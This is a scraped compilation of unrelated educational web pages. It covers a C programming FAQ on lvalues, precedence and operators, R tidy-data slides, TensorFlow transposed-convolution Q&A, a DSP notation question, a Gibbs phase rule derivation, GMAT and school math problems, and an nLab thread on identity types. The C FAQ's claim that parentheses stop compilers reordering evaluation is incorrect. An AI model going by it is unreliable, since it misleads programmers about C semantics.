    y = (x + 1); /* (x + 1) is an rvalue; y is an lvalue */

An assignment statement must have both an lvalue and an rvalue.
Therefore, the following statement would not compile because it is missing an rvalue:

    int x;
    x = void_function_call(); /* the function void_function_call() returns nothing */

If the function had returned an integer, it would be considered an rvalue because it evaluates into something that the lvalue, x, can store.

12. Is left-to-right or right-to-left order guaranteed for operator precedence?

The simple answer to this question is neither. The C language does not always evaluate left-to-right or right-to-left. Generally, function calls are evaluated first, followed by complex expressions and then simple expressions. Additionally, most of today's popular C compilers often rearrange the order in which the expression is evaluated in order to get better optimized code. You therefore should always explicitly define your operator precedence by using parentheses. For example, consider the following expression:

    a = b + c/d / function_call() * 5;

The way this expression is to be evaluated is totally ambiguous, and you probably will not get the results you want. Instead, try writing it with explicit operator precedence:

    a = b + (((c/d) / function_call()) * 5);

Using this method, you can be assured that your expression will be evaluated properly and that the compiler will not rearrange operators for optimization purposes.

13. What is the difference between ++var and var++?

The ++ operator is called the increment operator. When the operator is placed before the variable (++var), the variable is incremented by 1 before it is used in the expression. When the operator is placed after the variable (var++), the expression is evaluated, and then the variable is incremented by 1. The same holds true for the decrement operator (--). When the operator is placed before the variable, you are said to have a prefix operation. When the operator is placed after the variable, you are said to have a postfix operation.
For instance, consider the following example of postfix incrementation:

    int x, y;
    x = 1;
    y = (x++ * 5);

In this example, postfix incrementation is used, and x is not incremented until after the evaluation of the expression is done. Therefore, y evaluates to 1 times 5, or 5. After the evaluation, x is incremented to 2. Now look at an example using prefix incrementation:

    int x, y;
    x = 1;
    y = (++x * 5);

This example is the same as the first one, except that this example uses prefix incrementation rather than postfix. Therefore, x is incremented before the expression is evaluated, making it 2. Hence, y evaluates to 2 times 5, or 10.

14. What does the modulus operator do?

The modulus operator (%) gives the remainder of two divided numbers. For instance, consider the following portion of code:

    x = 15/7;

If x were an integer, the resulting value of x would be 2. However, consider what would happen if you were to apply the modulus operator to the same equation:

    x = 15%7;

The result of this expression would be the remainder of 15 divided by 7, or 1. This is to say that 15 divided by 7 is 2 with a remainder of 1. The modulus operator is commonly used to determine whether one number is evenly divisible by another. For instance, if you wanted to print every third letter of the alphabet, you would use the following code:

    int x;
    for (x=1; x<=26; x++)
        if ((x%3) == 0)
            printf("%c", x+64);

The preceding example outputs the string "CFILORUX" (x+64 lands in the uppercase range, since 'A' has ASCII code 65), which represents every third letter in the alphabet.
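The exact output of that last loop is easy to check with a one-line translation. This is a Python sketch used purely as a calculator for the ASCII codes, not part of the original C answer:

```python
# Same logic as the C loop: chr(x + 64) for every x from 1..26 divisible by 3.
out = "".join(chr(x + 64) for x in range(1, 27) if x % 3 == 0)
print(out)  # CFILORUX  (uppercase, since ord('A') == 65)
```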
https://rna.wlu.edu/bio297/03-tidy-data-1-slides.html
Start the exercise To update your project with the data and .rmd file for this exercise, run: bio297::start() Mechanical Turk survey Download the file johnsonlab.xlsx from the data/ subfolder and take a quick look at it in Excel. I've already installed readxl for you, but if I hadn't you could install this package with: install.packages("readxl") To load the functions in readxl into our current session, we'll use library: library(readxl) Packages and help pages At the console you can use: ls("package:readxl") ## [1] "excel_sheets" "read_excel" The read_excel function seems simple enough! Let's use it to load data from the first sheet: jd <- read_excel("data/johnsonlab.xlsx") Why didn't we have to specify a sheet argument above? Getting the lay of the land View(jd) • The data is tidy: each variable has a column, each observation a row • Variable names are formatted consistently These data are also a nice mix of variable types. We have: • Continuous data: VacuumTime • Discrete data: VacuumUnderstanding • Categorical data: Gender class(jd$VacuumTime) ## [1] "numeric" class(jd$VacuumUnderstanding) ## [1] "numeric" Now let's check on a categorical variable: class(jd$Gender) ## [1] "numeric" The facts about Factors • Use character to hold arbitrary text: for example codon sequences • Use factor to hold true categorical variables (Gender) with defined levels (male, female). gender <- factor( c("male", "female") ) gender ## [1] male female ## Levels: female male levels(gender) ## [1] "female" "male" You can index factors just like any other type of vector: gender[ c(1, 1, 2, 2, 1) ] ## [1] male male female female male ## Levels: female male Using factors to model categorical data We can replace the current numeric column with a factor: jd$Gender <- gender[ jd$Gender ] Check to make sure that worked and verify that you understand why it did! # Enter your code here! 
Summary statistics You can call summary on an entire data frame: summary(jd) Or just one vector: summary(jd$VacuumTime) ## Min. 1st Qu. Median Mean 3rd Qu. Max. ## 1.519 3.286 4.384 6.092 6.696 95.030 summary(jd$Gender) ## female male ## 118 58 Basic plotting Just like summary, the plotting functions like plot and boxplot are also a little bit magical in R. We can plot one numeric column: plot(jd$VacuumTime) Or make a scatter plot with two: plot(jd$VacuumTime, jd$VelcroTime) Formula syntax So that last scatter plot in formula syntax would be: plot(VelcroTime ~ VacuumTime, data = jd) boxplot(Age ~ Gender, data = jd) Use plot and boxplot to explore several other interactions in this data set! # Enter your code here! 2. When you're ready, use bio297::submit("03-tidy-data-1.rmd") to submit the assignment.
https://datascience.stackexchange.com/questions/26451/how-to-calculate-the-output-shape-of-conv2d-transpose
# How to calculate the output shape of conv2d_transpose?

Currently I code a GAN to generate MNIST numbers but the generator doesn't want to work. First I choose z with shape 100 per batch, put it into a layer to get the shape (7, 7, 256). Then a conv2d_transpose layer to get to 28, 28, 1 (which is basically an MNIST pic).

I have two questions:

1.) This code obviously doesn't work. Do you have any clue why?

2.) I am very aware how transposed convolution works but I can't find any resource to calculate the output size given input, strides and kernel size specific to TensorFlow. The useful information I found is https://arxiv.org/pdf/1603.07285v1.pdf but e.g. padding in TensorFlow works very differently. Can you help me?

    mb_size = 32  # Size of image batch to apply at each iteration.
    X_dim = 784
    z_dim = 100
    h_dim = 7*7*256
    dropoutRate = 0.7
    alplr = 0.2  # leaky ReLU

    def generator(z, G_W1, G_b1, keepProb, first_shape):
        G_W1 = tf.Variable(xavier_init([z_dim, h_dim]))
        G_b1 = tf.Variable(tf.zeros(shape=[h_dim]))
        G_h1 = lrelu(tf.matmul(z, G_W1) + G_b1, alplr)
        G_h1Drop = tf.nn.dropout(G_h1, keepProb)  # drop out
        X = tf.reshape(G_h1Drop, shape=first_shape)
        out = create_new_trans_conv_layer(X, 256, INPUT_CHANNEL, [3, 3], [2, 2],
                                          "transconv1", [-1, 28, 28, 1])
        return out

    # new transposed cnn
    def create_new_trans_conv_layer(input_data, num_input_channels, num_output_channels,
                                    filter_shape, stripe, name, output_shape):
        # setup the filter input shape for tf.nn.conv2d_transpose
        conv_filt_shape = [filter_shape[0], filter_shape[1],
                           num_output_channels, num_input_channels]
        # initialise weights and bias for the filter
        weights = tf.Variable(tf.truncated_normal(conv_filt_shape, stddev=0.03),
                              name=name + '_W')
        bias = tf.Variable(tf.truncated_normal([num_input_channels]), name=name + '_b')
        # setup the convolutional layer operation
        conv1 = tf.nn.conv2d_transpose(input_data, weights, output_shape,
                                       [1, stripe[0], stripe[1], 1], padding='SAME')
        conv1 += bias
        # apply a ReLU non-linear activation
        conv1 = lrelu(conv1, alplr)
        return conv1

    ...

    _, G_loss_curr = sess.run(
        [G_solver, G_loss],
        feed_dict={z: sample_z(mb_size, z_dim), keepProb: 1.0})  # training generator

Here is the correct formula for computing the size of the output with tf.layers.conv2d_transpose():

    # padding == "same":
    H = H1 * stride

    # padding == "valid":
    H = (H1 - 1) * stride + HF

where H = output size, H1 = input size, HF = height of filter.

e.g., if H1 = 7, stride = 3, and kernel size = 4: with padding=="same", output size = 21; with padding=="valid", output size = 22.

To test this out (verified in tf 1.4.0):

    import tensorflow as tf
    import numpy as np

    x = tf.placeholder(dtype=tf.float32, shape=(None, 7, 7, 32))
    dcout = tf.layers.conv2d_transpose(x, 64, 4, 3, padding="valid")

    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        xin = np.random.rand(1, 7, 7, 32)
        out = sess.run(dcout, feed_dict={x: xin})
        print(out.shape)

Take a look at the source code for tf.keras.Conv2DTranspose, which calls the function deconv_output_length when calculating its output size. There's a subtle difference between the accepted answer and what you find here:

    def deconv_output_length(input_length, filter_size, padding,
                             output_padding=None, stride=0, dilation=1):
      """Determines output length of a transposed convolution given input length.

      Arguments:
          input_length: Integer.
          filter_size: Integer.
          padding: one of "same", "valid", "full".
          output_padding: Integer, amount of padding along the output dimension.
              Can be set to None in which case the output length is inferred.
          stride: Integer.
          dilation: Integer.

      Returns:
          The output length (integer).
      """
      assert padding in {'same', 'valid', 'full'}
      if input_length is None:
        return None
      # Get the dilated kernel size
      filter_size = filter_size + (filter_size - 1) * (dilation - 1)
      # Infer length if output padding is None, else compute the exact length
      # note the call to max below!
      if output_padding is None:
        if padding == 'valid':
          length = input_length * stride + max(filter_size - stride, 0)
        elif padding == 'full':
          length = input_length * stride - (stride + filter_size - 2)
        elif padding == 'same':
          length = input_length * stride
      else:
        if padding == 'same':
          pad = filter_size // 2
        elif padding == 'full':
          pad = filter_size - 1
        elif padding == 'valid':
          pad = 0
        length = ((input_length - 1) * stride + filter_size - 2 * pad +
                  output_padding)
      return length

I added the comment above the call to max. The formula for padding == 'valid' is H = H1 * stride + max(HF - stride, 0), which only varies from @Manish P's answer when stride > HF. This one got me into trouble, so I thought I'd post it here.

Instead of using tf.nn.conv2d_transpose you can use tf.layers.conv2d_transpose. It is a wrapper layer and there is no need to input the output shape, or if you want to calculate the output shape you can use the formula:

    H = (H1 - 1)*stride + HF - 2*padding

    H  - height of output image, i.e. H = 28
    H1 - height of input image, i.e. H1 = 7
    HF - height of filter

The answers here give figures that work, but they don't mention that there are multiple possible output shapes for the convolution-transpose operation. Indeed, if the output shape was completely determined by the other parameters then there would be no need for it to be specified. The output size of a convolution operation is

    # padding == "SAME"
    conv_out = ceil(conv_in/stride)

    # padding == "VALID"
    conv_out = ceil((conv_in - k + 1)/stride)

where conv_in is the input size and k is the kernel size. In OP's link these padding methods are called 'half padding' and 'no padding' respectively. When calling tf.nn.conv2d_transpose(value, filter, output_shape, strides) we need the output_shape parameter to be the shape of a tensor that, if convolved with filter and strides, would have produced a tensor of the same shape as value. Because of rounding, there are multiple such shapes when stride > 1.
Specifically, for VALID padding we need

    ceil((dconv_out - k + 1)/s) = dconv_in
    ==> (dconv_in - 1)*s + k <= dconv_out <= dconv_in*s + k - 1

If dconv_in = 7, k = 4, stride = 3:

    # with SAME padding
    dconv_out = 19 or 20 or 21

    # with VALID padding
    dconv_out = 22 or 23 or 24

The tf.layers API automatically calculates an output_shape (which seems to be the smallest possible for VALID padding and the largest possible for SAME padding). This is often convenient, but can also lead to shape mismatches if you are trying to recover the shape of a previously convolved tensor, e.g. in an autoencoder. For example

    import tensorflow as tf
    import numpy as np

    k = 22
    cin = tf.placeholder(tf.float32, shape=(None, k+1, k+1, 64))
    w1 = tf.placeholder(tf.float32, shape=[4, 4, 64, 32])
    cout = tf.nn.conv2d(cin, w1, strides=(1, 3, 3, 1), padding="VALID")
    f_dict = {cin: np.random.rand(1, k+1, k+1, 64), w1: np.random.rand(4, 4, 64, 32)}

    dcout1 = tf.nn.conv2d_transpose(cout, w1, strides=(1, 3, 3, 1),
                                    output_shape=(1, 22, 22, 64), padding="VALID")
    dcout2 = tf.nn.conv2d_transpose(cout, w1, strides=(1, 3, 3, 1),
                                    output_shape=(1, 23, 23, 64), padding="VALID")
    rcout = tf.layers.conv2d_transpose(cout, 64, 4, 3, padding="VALID")

    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        inp_shape = sess.run(cin, feed_dict=f_dict).shape
        conv_shape = sess.run(cout, feed_dict=f_dict).shape
        lyrs_shape = sess.run(rcout, feed_dict=f_dict).shape
        nn_shape1 = sess.run(dcout1, feed_dict=f_dict).shape
        nn_shape2 = sess.run(dcout2, feed_dict=f_dict).shape

    print("original input shape:", inp_shape)
    print("shape after convolution:", conv_shape)
    print("recovered output shape using tf.layers:", lyrs_shape)
    print("one possible recovered output shape using tf.nn:", nn_shape1)
    print("another possible recovered output shape using tf.nn:", nn_shape2)

    >>> original input shape: (1, 23, 23, 64)
    >>> shape after convolution: (1, 7, 7, 32)
    >>> recovered output shape using tf.layers: (1, 22, 22, 64)
    >>> one possible recovered output shape using tf.nn: (1, 22, 22, 64)
    >>> another possible recovered output shape using tf.nn: (1, 23, 23, 64)
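The size relations quoted above can be checked without TensorFlow at all. The following is a framework-free Python sketch (function names are mine, not from any of the answers) that enumerates every output length whose forward convolution would reproduce a given input length:

```python
import math

def conv_out(conv_in, k, stride, padding):
    # Forward convolution output length, per the formulas quoted above.
    if padding == "SAME":
        return math.ceil(conv_in / stride)
    return math.ceil((conv_in - k + 1) / stride)  # "VALID"

def deconv_out_shapes(dconv_in, k, stride, padding):
    # Every candidate output length that a convolution with the same
    # parameters would map back to dconv_in.
    candidates = range(dconv_in, dconv_in * stride + k + 1)
    return [n for n in candidates if conv_out(n, k, stride, padding) == dconv_in]

print(deconv_out_shapes(7, 4, 3, "SAME"))   # [19, 20, 21]
print(deconv_out_shapes(7, 4, 3, "VALID"))  # [22, 23, 24]
```

This reproduces the dconv_in = 7, k = 4, stride = 3 example: three possible output shapes per padding mode, matching the stride.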
https://dsp.stackexchange.com/questions/68484/confusion-regarding-notation-symbol/68486
# Confusion regarding notation/symbol?

I was reading the circular convolution topic from *Digital Signal Processing Using Matlab*, 3rd ed., by Proakis. I came across a strange term/symbol; I have highlighted it in the attached snapshot. I have also attached a snapshot of Eq. (5.24), where this $\mathcal{R}_N(n)$ symbol appears as well.

• Can you give a little more context on the topic being explained here? By looking at just this I can only imagine that this term represents the $n^{th}$ component of a vector in N dimensions, usually represented as $\mathcal{R}^N$. – DSP Rookie Jun 20 at 11:44
• Proakis wrote/edited multiple books, in multiple revisions. Which one is this, which page? – Marcus Müller Jun 20 at 11:53

This symbol denotes a rectangular pulse of length $N$:

$$\mathcal{R}_N(n)=\begin{cases}1,&0\le n\le N-1\\0,&\textrm{otherwise}\end{cases}$$

I'm not sure where it is defined for the first time, but this definition is clear from the equation above Eq. (5.24) on page 130 of the 3rd edition of *Digital Signal Processing Using Matlab* by V.K. Ingle and J.G. Proakis.

• @engr: I don't see how it's different. If you interpret $\mathcal{R}_N(n)$ as in my answer, it matches exactly the equation given in the book. – Matt L. Jun 20 at 14:49
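As a quick sanity check, the rectangular pulse defined above is a one-line function (the name `rect` is my own, not the book's):

```python
def rect(n, N):
    """Rectangular pulse R_N(n): 1 for 0 <= n <= N - 1, 0 otherwise."""
    return 1 if 0 <= n <= N - 1 else 0

# a window of length N = 4, sampled from n = -2 to n = 5
print([rect(n, 4) for n in range(-2, 6)])  # [0, 0, 1, 1, 1, 1, 0, 0]
```

Multiplying a sequence by `rect(n, N)` is exactly the windowing operation used in the circular-convolution derivation.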
https://byjus.com/physics/derivation-of-phase-rule/
# Derivation of Phase Rule

The phase rule gives the number of degrees of freedom of an enclosed system at equilibrium in terms of the number of separate phases and the number of chemical constituents in the system. It was deduced by J.W. Gibbs in the 1870s, and today it is popularly known as the Gibbs phase rule. Here, in this article, we will discuss the derivation of the phase rule.

## Gibbs Phase Rule

Gibbs' phase rule states that if the equilibrium in a heterogeneous system is not affected by gravity or by electrical and magnetic forces, the number of degrees of freedom is given by the equation

F = C - P + 2

where C is the number of chemical components and P is the number of phases. Basically, it describes the mathematical relationship for determining the stability of the phases present in a material at equilibrium. In the next section, let us look at the phase rule derivation.

### Phase Rule Derivation

The Gibbs phase rule can be derived from thermodynamics as follows. Consider a heterogeneous system consisting of P phases and C components in equilibrium, and assume that the passage of a component from one phase to another does not involve any chemical reaction. When the system is in equilibrium, it can be described by the following parameters:

• Temperature
• Pressure
• The composition of each phase

a. The total number of variables required to specify the state of the system:

• Pressure: the same for all phases
• Temperature: the same for all phases
• Concentration

The number of independent concentration variables for one phase with respect to the C components is C - 1. Therefore, the number of independent concentration variables for P phases is P(C - 1).

Total number of variables = P(C - 1) + 2 (1)

b.
The total number of equilibria: The various phases present in the system can remain in equilibrium only when the chemical potential (µ) of each component is the same in all phases, i.e.

µ1,P1 = µ1,P2 = µ1,P3 = … = µ1,P
µ2,P1 = µ2,P2 = µ2,P3 = … = µ2,P
⋮
µC,P1 = µC,P2 = µC,P3 = … = µC,P

For each component, the number of independent equalities across P phases is P - 1. For C components, the total number of equilibria is therefore

E = C(P - 1). (2)

Subtracting (2) from (1), we get

$F=[P(C-1)+2]-[C(P-1)]$

$F=CP-P+2-CP+C$

$F=C-P+2$

The obtained formula is the Gibbs phase rule. Stay tuned to BYJU'S to learn more physics derivations.
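The rule is easy to check numerically with the standard example of pure water (C = 1): at the triple point three phases coexist and no degrees of freedom remain, while along the boiling curve two phases coexist and one degree of freedom remains. A minimal sketch:

```python
def gibbs_dof(C, P):
    """Gibbs phase rule: degrees of freedom F = C - P + 2."""
    return C - P + 2

print(gibbs_dof(1, 3))  # 0: the triple point of water is a single fixed point
print(gibbs_dof(1, 2))  # 1: on the boiling curve, fixing T also fixes p
```

A negative result signals an impossible equilibrium, e.g. four coexisting phases of a pure substance.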
https://earthscience.stackexchange.com/questions/10635/where-can-i-find-information-about-the-basic-concepts-of-sedimentary-basins/10638
# Where can I find information about the basic concepts of sedimentary basins?

There are a lot of papers on the web, but they don't explain the concepts; they just mention them, taking it for granted that the reader already knows them. I mean terms like piggyback basin, forearc, back-arc, intracratonic, intramontane, etc.
https://gmatclub.com/forum/a-square-is-drawn-by-joining-the-midpoints-of-the-sides-of-a-102880.html
A square is drawn by joining the midpoints of the sides of a given square. A third square is drawn inside the second square in the same way, and this process is continued indefinitely. If a side of the first square is 4 cm, determine the sum of the areas of all the squares.

A. 18
B. 32
C. 36
D. 64
E. None

Solution (Bunuel, Math Expert):

Let the side of the first square be $$a$$, so its area will be $$area_1=a^2$$;

The next square will have diagonal equal to $$a$$, so its area will be $$area_2=\frac{d^2}{2}=\frac{a^2}{2}$$;

And so on.
So the areas of the squares form an infinite geometric progression: $$a^2$$, $$\frac{a^2}{2}$$, $$\frac{a^2}{4}$$, $$\frac{a^2}{8}$$, $$\frac{a^2}{16}$$, ... with common ratio $$\frac{1}{2}$$.

For a geometric progression with common ratio $$|r|<1$$, the sum of the progression is $$sum=\frac{b}{1-r}$$, where $$b$$ is the first term. So the sum of the areas will be $$sum=\frac{a^2}{1-\frac{1}{2}}=\frac{4^2}{\frac{1}{2}}=32$$.

Other replies:

• B. 32. The areas form the GP s^2 + 2(s/2)^2 + 4(s/4)^2 + ...

• Straight 32. The area of the square created by joining the midpoints of a square is half that of the bigger square, so the series becomes 16 + 8 + 4 + ... Apply the infinite GP formula a/(1 - r) with a = 16 and r = 0.5.

• Alternatively, construct the series: 16, 8, 4, 2, 1, 1/2 (0.5), 1/4 (0.25), 1/8 (0.125), 1/16 (0.06), 1/32 (0.03), 1/64 (0.01), and so on. The sum from 16 down to 1/64 is 31.975, and as we move forward in the series the terms become insignificant, adding only infinitesimally small values to 31.975. So the answer will be very close to 31.975; hence 32. One drawback of this method is that one has to be very comfortable dealing with fractions.
Question (WholeLottaLove): I don't quite follow the step "the next square will have diagonal equal to a". You say the diagonal is equal to a (the side of the outer square), but isn't the new side equal to half the diagonal times √2?

Answer (Bunuel): The area of a square is $$side^2$$ or $$\frac{diagonal^2}{2}$$. [Attachment: Squares.png] The length of a diagonal of the blue (inner) square is equal to the length of a side of the black (outer) square. The area of the black square is $$side^2=a^2$$ and the area of the blue square is $$\frac{diagonal^2}{2}=\frac{a^2}{2}$$. Hope it's clear.

Estimation approach: the area of the first square is 4^2 = 16. The second one has sides 2√2 and area 8, so the total is already above 24; we can eliminate A and E right away. The third square has side 2 and area 4, giving 24 + 4 = 28; the fourth has side √2 and area 2, giving 28 + 2 = 30. Since the pattern continues infinitely and the areas decrease at a rapid rate, the sum must be the closest answer choice, which is 32.
Follow-up: Dear Bunuel, do you have a thread that says it all about geometric progressions? If yes, could you link it to me, please?

Answer (Bunuel): See "12. Sequences" under ALL YOU NEED FOR QUANT.

Another solution: the sides of the successive squares are 4, 2√2, 2, √2, 1, and so on, so the areas are 16, 8, 4, 2, 1, 0.5, and so on. This is a GP with first term a1 = 16 and common ratio r = 1/2. The sum of n terms is a1(r^n - 1)/(r - 1); as n tends to infinity, r^n = (1/2)^n tends to zero, so Sum = a1(0 - 1)/(-0.5) = 16 × 2 = 32. Answer: B.
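The geometric-series argument is easy to confirm numerically; after a few dozen halvings the partial sums are indistinguishable from 32:

```python
side = 4.0
area = side ** 2          # 16, then 8, 4, 2, ... (each inner square halves the area)
total = 0.0
for _ in range(60):       # 60 terms already exhausts double precision
    total += area
    area /= 2
print(round(total, 6))  # 32.0
```

The same loop with any starting side s converges to 2 * s**2, matching the closed form a/(1 - r) with a = s^2 and r = 1/2.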
https://www.sarthaks.com/104242/if-the-points-a-6-1-b-8-2-c-9-4-and-d-k-p-are-the-vertices-of-a-parallelogram-taken-in-order
# If the points A(6, 1), B(8, 2), C(9, 4) and D(k, p) are the vertices of a parallelogram taken in order, then find the values of k and p.

Let A(6, 1), B(8, 2), C(9, 4) and D(k, p) be the given points. Since ABCD is a parallelogram, its diagonals bisect each other, so the midpoint of AC coincides with the midpoint of BD:

((6 + 9)/2, (1 + 4)/2) = ((8 + k)/2, (2 + p)/2)

Hence 8 + k = 15 and 2 + p = 5, giving k = 7 and p = 3.
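Rearranging the diagonal-bisection condition gives D = A + C - B, so the answer can be verified in a couple of lines:

```python
A, B, C = (6, 1), (8, 2), (9, 4)

# diagonals of a parallelogram bisect each other: midpoint(AC) == midpoint(BD),
# which rearranges to D = A + C - B componentwise
k = A[0] + C[0] - B[0]
p = A[1] + C[1] - B[1]
print(k, p)  # 7 3
```

The same one-liner finds the fourth vertex of any parallelogram given three consecutive vertices.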
https://solvedlib.com/a-group-of-ten-seniors-nine-juniors-six,185908
# A group of ten seniors, nine juniors, six sophomores, and five freshmen must select a committee...

###### Question:

A group of ten seniors, nine juniors, six sophomores, and five freshmen must select a committee of four. How many committees are possible if the committee must contain the following?

(a) one person from each class
(b) any mixture of the classes (answer given: 27405)
(c) exactly two seniors
https://nforum.ncatlab.org/discussion/3306/identity-type/?Focus=68790
• CommentRowNumber1. • CommentAuthorUrs • CommentTimeNov 18th 2011 added to identity type a mention of the alternative definition in terms of inductive types (paths). • CommentRowNumber2. • CommentAuthorMike Shulman • CommentTimeNov 18th 2011 Thanks! It’s not really an alternative definition, though, just an encompassing of the other definition into a general framework. Also, it predates HoTT by a lot. I edited the page some trying to clarify. • CommentRowNumber3. • CommentAuthorUrs • CommentTimeNov 18th 2011 Ah, okay. That wasn’t clear to me. Thanks. • CommentRowNumber4. • CommentAuthorMike Shulman • CommentTimeDec 13th 2011 I have added to identity type some discussion of the stability/coherence obstacles to interpreting identity types categorically in a WFS, along with some more references. • CommentRowNumber5. • CommentAuthorMike Shulman • CommentTimeMar 26th 2012 I added to identity type a discussion of how the definitional eta-conversion rule for identity types forces us into extensional type theory. • CommentRowNumber6. • CommentAuthorMike Shulman • CommentTimeMar 26th 2012 I wonder: is there a negative presentation of identity types? • CommentRowNumber7. • CommentAuthorUrs • CommentTimeMay 9th 2012 at identity type in the section on categorical semantics I have added some actual details on how that proceeds (to the existing discussion of what conditions on the ambient category we need for this). • CommentRowNumber8. • CommentAuthorUrs • CommentTimeNov 30th 2014 For fun, I have given identity type a lead-in quote: everything is identical with itself (WdL §863); no two things are like each other (WdL §903). Beyond being fun, it is reminiscent of how there is no way to prove an equality other than by reducing it to reflexivity.
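As a sketch of the inductive presentation discussed in #1–#2 (and of the derivability of symmetry that comes up later in the thread), here is the idea in Lean 4 notation; the names `Id'`, `J` and `symm` are illustrative rather than Lean's built-ins, and this is a sketch, not anyone's official definition:

```lean
-- The identity type as the inductive family generated by reflexivity;
-- `Id'` is an illustrative name, avoiding Lean's built-in `Eq`.
inductive Id' {A : Type} : A → A → Type where
  | refl (a : A) : Id' a a

-- The eliminator (J-rule / path induction) is exactly the recursion
-- principle this inductive definition generates: to construct
-- `C x y p` for every identification `p`, it suffices to handle `refl`.
def J {A : Type} (C : (x y : A) → Id' x y → Type)
    (c : (a : A) → C a a (Id'.refl a))
    {x y : A} (p : Id' x y) : C x y p :=
  match p with
  | Id'.refl a => c a

-- Symmetry (cf. Lemma 2.1.1 of the HoTT book) is then derivable
-- rather than postulated: induct, and give `refl` as its own inverse.
def symm {A : Type} {x y : A} (p : Id' x y) : Id' y x :=
  J (fun x y _ => Id' y x) (fun a => Id'.refl a) p
```

The point of the sketch is the one made in #2: the J-rule is not an extra axiom on top of the inductive definition but the elimination principle that the definition already carries.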
• CommentRowNumber9. • CommentAuthorMike Shulman • CommentTimeNov 30th 2014 In a similar vein, I have been amused to notice that as Arthur grows up, one of the more difficult things for him to learn is that two things can be isomorphic without being identical (e.g. the beans on his plate and the beans on Dad’s plate). • CommentRowNumber10. • CommentAuthorDavid_Corfield • CommentTimeNov 30th 2014 You do realise that you and Urs now have the perfect opportunity to see how children brought up in the HoTT spirit will think mathematically. Think how much harder it will be at a later stage to work out how money works. Not only do they go through the stage of worrying about which particular coin they have, but that it’s treated as the same as combinations of coins. • CommentRowNumber11. • CommentAuthorNikolajK • CommentTimeDec 1st 2014 David, even in my daily life I’m often confronted with how plain bijections are not good isomorphisms in the category of coins, closed under addition. If they were, it would spare me some NP-complete problems. Sure, everything I can buy with a 5er, I can also buy with five 1’s. But if some machine takes two 1’s, I can’t use my 5er to get gum out of a machine. It’s curious how money is partitioned into 1’s, 2’s, 5’s and 10-multiples of it. When I’m waiting in a queue, I always compute whether I can generate all composites to pay “right”: with {1,2,2,5} you can pay 1,2,3,4,5,6,7,8,9. Funny how replacing a 2 with a 1 only changes the upper bound, but not e.g. your ability to produce 4. With more money, {1,5,5} say, you have far fewer options :) Having 11 units of money really isn’t just having 11 units of it. I was in Russia last month and when I ran out of money for some days, the boss of the firm we worked in said he’d help me out with some cash - of course I’d give him back whatever I didn’t need. Well, this guy then gave me a note worth a huge amount.
I assume he meant the best, but to me it was an ass move as I just couldn’t break the note and give him back some small ones. He gave me too much and so he gave me nothing. • CommentRowNumber12. • CommentAuthorUrs • CommentTimeDec 1st 2014 On my end, the Proceß has not expressed the moment of quantity yet, it still needs to sublate becoming into a more determinate being first. Also, I am still worried not so much about the identity type of beans as about it being inhabited at all. • CommentRowNumber13. • CommentAuthorDavid_Corfield • CommentTimeMay 2nd 2018 Some of the βs and ηs had become $\infty$ in links, so I fixed this. I guess we just live with using η-reduction, -conversion, -expansion interchangeably. 1. Thanks David! This one was my fault, sorry, again it’s related to the unicode issues. When I get the time to try to fix things once and for all, I’ll look out for occurrences of this one. • CommentRowNumber15. • CommentAuthorMike Shulman • CommentTimeMay 2nd 2018 As explained at the page eta-conversion, $\eta$-reduction, $\eta$-conversion, and $\eta$-expansion are technically all slightly different things, though of course very closely related. $\eta$-conversion is an undirected equivalence relation; $\eta$-reduction and $\eta$-expansion are the two opposite ways to “direct” this relation. Would it be useful to mention this point on the page identity type? • CommentRowNumber16. • CommentAuthorDavid_Corfield • CommentTimeMay 2nd 2018 I wonder if we use these consistently, e.g., at Extensionality and η-conversion. • CommentRowNumber17. • CommentAuthorUrs • CommentTimeAug 5th 2018 also pointer to Licata 11. Is that where the observation originates? • CommentRowNumber18. 
• CommentAuthorUrs • CommentTimeAug 5th 2018 • (edited Aug 5th 2018) Hm, it seems that my first edit-message did not get through: I had added pointer to Shulman 12 and was asking: Where is the origin of the observation that identity types are simply inductive type families generated by reflexivity? • CommentRowNumber19. • CommentAuthorMike Shulman • CommentTimeAug 5th 2018 Oh, way earlier than that. For instance, identity types are defined that way in Coq and have been since forever, as far as I know. • CommentRowNumber20. • CommentAuthorColin Tan • CommentTimeNov 28th 2018 From, say, the inductive definition of identity types, is it clear that the interpretation of $Id_A(x,y)$ as the type of proofs that x is less than or equal to y is excluded? For example, what if a type A is really an oo-category, so that $Id_A(x, y)$ is the type of morphisms from an object x of A to another object y of A? It would still be true that there is an identity morphism in $Id_A(x, x)$. • CommentRowNumber21. • CommentAuthorAli Caglayan • CommentTimeNov 28th 2018 @Colin I think what you are trying to say is “can we have directed ’identity’ types”. From the given inductive definition, the answer is a straight no; however, many people have investigated and still are investigating similar types which behave more like the arrows of a category than those of a groupoid. I wouldn’t call this the identity type, however. The symmetry of Id_A(x,y) isn’t something we add on but is actually something that can be proven, so if you were to have an arrow type it wouldn’t look very similar to the identity type. I would look at directed type theory, although I must say it isn’t very developed yet. • CommentRowNumber22. • CommentAuthorDavid_Corfield • CommentTimeNov 28th 2018 • (edited Nov 28th 2018) You can of course do category theory in HoTT, see sec 9.1 of the HoTT book. This will involve a type of objects and then a dependent type of morphisms between two objects. But that’s not the identity type.
In a category, the type of isomorphisms between two objects will equal their identity type. As Alizter says, also look at directed homotopy type theory. • CommentRowNumber23. • CommentAuthorAli Caglayan • CommentTimeNov 28th 2018 There isn’t much content in the article David linked, but you should definitely look at some of the references. That is pretty much all the work that has been done on the topic. • CommentRowNumber24. • CommentAuthorColin Tan • CommentTimeNov 28th 2018 Alizter, thank you very much for the pointers and for articulating what I was trying to ask in better language. Do you have a reference for a proof that $Id_A(x, y)$ is symmetric? Mike also makes a comment on the derivability of this at Martin-Löf+dependent+type+theory#equality_types. • CommentRowNumber25. • CommentAuthorDavid_Corfield • CommentTimeNov 28th 2018 Lemma 2.1.1 of the HoTT book. Essentially, by induction for identity types, you just have to show that the $refl$ terms have inverses, which clearly they do. 2. Fixed a tiny typo: an -> a anqurvanillapy • CommentRowNumber27. • CommentAuthorUrs • CommentTimeJun 25th 2019 pointers to the original observations relating identity types to groupoids and higher groupoids were and still largely are missing from this entry. But I have now added at least these two: • Martin Hofmann, Thomas Streicher, The groupoid interpretation of type theory, in: Giovanni Sambin et al. (eds.), Twenty-five years of constructive type theory, Proceedings of a congress, Venice, Italy, October 19–21, 1995. Oxford: Clarendon Press. Oxf. Logic Guides. 36, 83-111 (1998). (ps) • Steve Awodey, Michael Warren, Homotopy theoretic models of identity types, Mathematical Proceedings of the Cambridge Philosophical Society vol 146, no. 1 (2009) 